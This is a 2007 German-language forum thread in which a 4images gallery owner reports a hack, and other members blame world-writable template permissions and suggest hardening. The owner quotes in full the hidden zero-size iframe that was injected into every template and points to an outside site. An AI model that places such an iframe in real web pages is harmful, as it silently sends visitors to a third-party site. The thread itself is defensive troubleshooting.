Author Topic: Gallerie wurde geSpamed / Hacked!!!  (Read 6003 times)

0 Members and 1 Guest are viewing this topic.

Offline darvid

  • Jr. Member
  • **
  • Posts: 96
    • View Profile
    • KNOWTEBOOK.COM - Community for webdeveloper
Gallerie wurde geSpamed / Hacked!!!
« on: July 09, 2007, 04:25:38 PM »
Hi,

ich war bisher eigentlich überzeugt von 4Images.
Heute jedoch musste ich bemerken, dass meine Webseite extrem langsam war. Das machte mich stutzig und sah im Quellcode nach.

Ein Spammer hatte in jede HTML Template Datei folgenden Iframe platziert:

Code: [Select]
<iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
Das erscheint mir einleuchtend, laut Anleitung sollen ja alle Template Dateien die vollen Zugriffs, Lese und Schreibrechte bekommen (chmod 777).

Ist das eine Sicherheitslücke bei 4images oder mein Fehler?

Jedensfalls ist mein zuvor 100% positiver Eindruck von 4images jetzt getrügt und ich werde die Rechte auf das Minimum runterbrechen.
/* KNOWTEBOOK - BoostYourself community for webdeveloper
/* http://www.knowtebook.com

Integration von Wordpress Blog, PHPBB Forum und 4Images Bildergalerie:
http://www.sebastianscheuer.de/aktuell/integration-von-wordpress-blog-phpbb-forum-und-4images-bildergallerie/
DEMO: http://www.pilotenbilder.de/

Offline kai

  • Administrator
  • Addicted member
  • *****
  • Posts: 1.423
    • View Profile
    • 4images - Image Gallery Management System
Re: Gallerie wurde geSpamed / Hacked!!!
« Reply #1 on: July 09, 2007, 05:56:44 PM »
Hallo,

handelt es sich um http://www.pilotenbilder.de/index2.php ?

Powered by 4images 1.7  ?
Your first three "must do" before you ask a question:
1. Forum rules
2. FAQ
3. Search

Offline KurtW

  • 4images Guru
  • *******
  • Posts: 2.778
    • View Profile
    • Malediven-Bilder ~~Dreams~~
Re: Gallerie wurde geSpamed / Hacked!!!
« Reply #2 on: July 09, 2007, 06:49:09 PM »
Hallo,
laut install doc:
http://www.4homepages.de/forum/index.php?topic=7400.0
Quote
chmod 666 (-rw-rw-rw-) : alle Dateien im Verzeichnis "templates/default"
chmod 666 (-rw-rw-rw-) : alle Dateien im Verzeichnis "templates/default/media"

Dies ist aber auch nur nötig, weil über das ACP die templates editiert werden können.
Ich habe kein template mit 666, alles über ftp...

Hinweis:  einige .php files, die ich vor ca. 1 Monat versehentlich mit 666 eingestellt habe, wurden gleichfalls mit einem
iframe Code am Ende jeder Datei versehen/ gehackt.


Gruß
Kurt

Offline honda2000

  • 4images Guru
  • *******
  • Posts: 3.263
    • View Profile
    • Wir machen Internet!
Re: Gallerie wurde geSpamed / Hacked!!!
« Reply #3 on: July 09, 2007, 07:16:54 PM »
CHMOD777 ist doch nur in dem augenblick norwendig, wo template-Dateien über das ControlPanel editiert werden, danach stellt man die sofort auf 644 zurück!!

daraf ich mal bescheiden fragen, wieso ihr eueren Admin-Ordner nicht mit einer .htaccess + htpasswd schützt???